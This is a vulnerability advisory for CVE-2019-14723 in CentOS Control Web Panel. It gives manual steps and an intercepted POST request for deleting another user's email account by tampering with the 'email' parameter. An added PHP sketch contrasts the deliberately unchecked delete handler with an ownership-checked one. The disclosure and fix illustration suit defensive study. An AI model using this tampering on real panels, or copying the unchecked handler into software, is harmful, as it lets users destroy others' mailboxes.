Exploit Title       : CWP (CentOS Control Web Panel) Delete other email account
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     :
Software Link       : Not available, user panel only available for latest version
Version             :
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14723
Reference           : N/A
  1. Log in as a normal user.
  2. Go to "Email Accounts"
  3. Try to delete any email account
  4. Intercept the request and change the "email" parameter to another email address
POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2
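
The missing server-side check behind this issue, as an added example that is not part of the original advisory and not CWP's own code. It contrasts a handler that trusts the client-supplied "email" value with one that verifies mailbox ownership against the session user; the function names, the mailbox table and the example.com-style addresses are assumptions constructed for illustration.

```php
<?php
// Hypothetical sketch: function names and the mailbox table are assumptions.

// Constructed sample data: mailbox address => owning panel account.
function sampleMailboxes(): array
{
    return [
        'alice@alice.example' => 'alice',
        'sales@alice.example' => 'alice',
        'bob@bob.example'     => 'bob',
    ];
}

// Unsafe pattern: acts on whatever address the client put in "email".
function deleteMailboxUnchecked(array &$mailboxes, string $email): bool
{
    if (!isset($mailboxes[$email])) {
        return false;
    }
    unset($mailboxes[$email]);
    return true;
}

// Checked pattern: $sessionUser must come from the server-side session,
// never from the URL path or the request body.
function deleteMailboxChecked(array &$mailboxes, string $sessionUser, string $email): bool
{
    $email = strtolower(trim($email));
    $owner = $mailboxes[$email] ?? null;
    if ($owner === null || $owner !== $sessionUser) {
        // Same answer for "no such mailbox" and "not yours"; log for detection.
        error_log('emaildelete denied: user=' . json_encode($sessionUser)
            . ' target=' . json_encode($email));
        return false;
    }
    unset($mailboxes[$email]);
    return true;
}

// Session user "alice" submits a tampered "email" value.
$unsafe = sampleMailboxes();
$safe   = sampleMailboxes();
var_dump(deleteMailboxUnchecked($unsafe, 'bob@bob.example'));          // another user's mailbox
var_dump(deleteMailboxChecked($safe, 'alice', 'bob@bob.example'));     // tampered request
var_dump(deleteMailboxChecked($safe, 'alice', 'sales@alice.example')); // own mailbox
var_dump(isset($unsafe['bob@bob.example']), isset($safe['bob@bob.example']));
```

The denied-request log line gives defenders a signal to alert on when one session repeatedly targets mailboxes it does not own.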
